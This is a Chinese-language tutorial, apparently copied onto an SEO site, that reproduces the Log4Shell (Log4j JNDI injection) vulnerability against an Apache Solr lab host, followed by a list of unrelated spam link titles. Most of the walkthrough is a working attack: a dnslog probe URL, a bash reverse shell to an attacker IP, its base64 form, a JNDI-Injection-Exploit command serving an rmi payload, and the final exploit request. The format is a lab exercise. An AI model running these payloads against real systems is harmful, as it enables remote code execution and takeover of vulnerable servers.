当前位置: 首页 > wzjs >正文

沧州手机网站建设外贸网站免费建站

沧州手机网站建设,外贸网站免费建站,为什么公司的网站打不开,浙江建设厅特种考试查询一、漏洞特征 Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的…

一、漏洞特征
Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。
影响版本:Apache Log4j 2.x <= 2.14.1
访问http://192.168.232.131:8983/即可查看到Apache Solr的后台页面
在这里插入图片描述

访问
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:ldap://ugvqt3.dnslog.cn}
dnslog可以收到相关日志
在这里插入图片描述

二、漏洞复现
1.准备payload
bash -i >& /dev/tcp/192.168.245.2/6969 0>&1
192.168.245.2是攻击机ip
base加密:YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==
在这里插入图片描述

2.开启监听
在这里插入图片描述

3.获取jndi payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0NS4yLzY5NjkgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 192.168.245.2
这里echo后面就是你加密之后的值,最后面的IP还是攻击机的IP,回车启动
在这里插入图片描述

启动后提取第一个payload:rmi://192.168.245.2:1099/sfvz6q
4.反弹shell
http://192.168.232.131:8983/solr/admin/cores?action=${jndi:rmi://192.168.245.2:1099/sfvz6q}
在这里插入图片描述

http://www.dtcms.com/wzjs/256693.html

相关文章:

  • wordpress 不能更新百度seo营销推广多少钱
  • 微信网站开发流程佛山网站建设维护
  • 耐思尼克的建站宝盒关键词调整排名软件
  • 做行业网站投入seo站内优化教程
  • 网站首页线框图怎么做南宁百度seo排名价格
  • 武汉光谷做网站费用商城网站建设
  • 深圳 网站建设 销售长沙seo排名优化公司
  • 大连网站建设-中国互联win7优化大师免安装版
  • 蓬莱建网站做网站的公司哪家好
  • 网站备案相关前置许可搜索引擎整合营销
  • php网站开发面向对象教程营销策略是什么意思
  • 网站建设招标需求it行业培训机构哪个好
  • 机械网站建设公司网站宣传费用
  • 天津做网站找津坤科技专业seo职业培训学校
  • 如何做网站咨询互联网营销师怎么考
  • 网站关键词优化服务谷歌google
  • 苹果手机软件开发工具百度seo网站优化
  • 个人特种作业证查询小红书seo软件
  • 合肥百度快照优化排名郑州seo顾问
  • 国内金融行业网站开发快速排名优化推广价格
  • 网站建设授权书适合30岁短期培训班
  • 企业推广是什么职业seo网站关键词排名快速
  • 厦门做企业网站的公司网站建设的推广渠道
  • 写作网站设定线下推广
  • 天津网站制作百度指数怎么算
  • 开发一款软件的费用三明网站seo
  • 国外注册机网站软文发布平台媒体
  • 检测网站是否被做跳转世界足球排名最新
  • b2c所有网站在线一键生成网页
  • 珠海商城网站建设网站查询系统